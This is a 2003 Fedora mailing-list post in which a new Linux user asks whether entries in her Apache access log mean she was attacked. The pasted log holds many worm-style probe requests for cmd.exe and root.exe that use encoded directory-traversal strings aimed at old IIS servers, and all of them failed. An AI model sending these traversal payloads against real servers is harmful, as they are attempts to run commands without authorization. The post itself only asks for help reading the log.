attacked? hacked? help.....!
Lisa Durham
lisa at natec.net
Tue Dec 9 05:26:52 UTC 2003
I am very new to Linux but was poking around in my newly setup Fedora
Core 1 system today and came upon the lines below in the Apache Access
Log when I used the "System Logs" icon in the System Tools Menu.
Is the IP at the beginning of each line the IP that requested the file
that is shown at the end of the line? with the date and time in the
center? If this isn't what's shown in this file, what is this format?
What does this file tell me? Am I paranoid, or was someone trying to
access my machine (but ignorantly assuming it was a Windows machine)?
quoted Apaches Access Log:
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 325 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:47 -0600] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:48 -0600] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:49 -0600] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 382 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:52 -0600] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:39:56 -0600] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:17 -0600] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:18 -0600] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
"-" "-"
24.60.93.48 - - [07/Dec/2003:14:40:19 -0600] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
211.239.107.43 - - [07/Dec/2003:15:40:29 -0600] "GET
/scripts/nsiislog.dll" 404 331 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 327 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:01 -0600] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 366 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 382 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:02 -0600] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 348 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 339 "-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349
"-" "-"
24.199.161.83 - - [07/Dec/2003:17:59:03 -0600] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 349 "-" "-"
217.120.149.161 - - [07/Dec/2003:18:27:17 -0600] "GET
/scripts/nsiislog.dll" 404 331 "-" "-"
----------------------------------------
Thanks,
Lisa
More information about the fedora-list
mailing list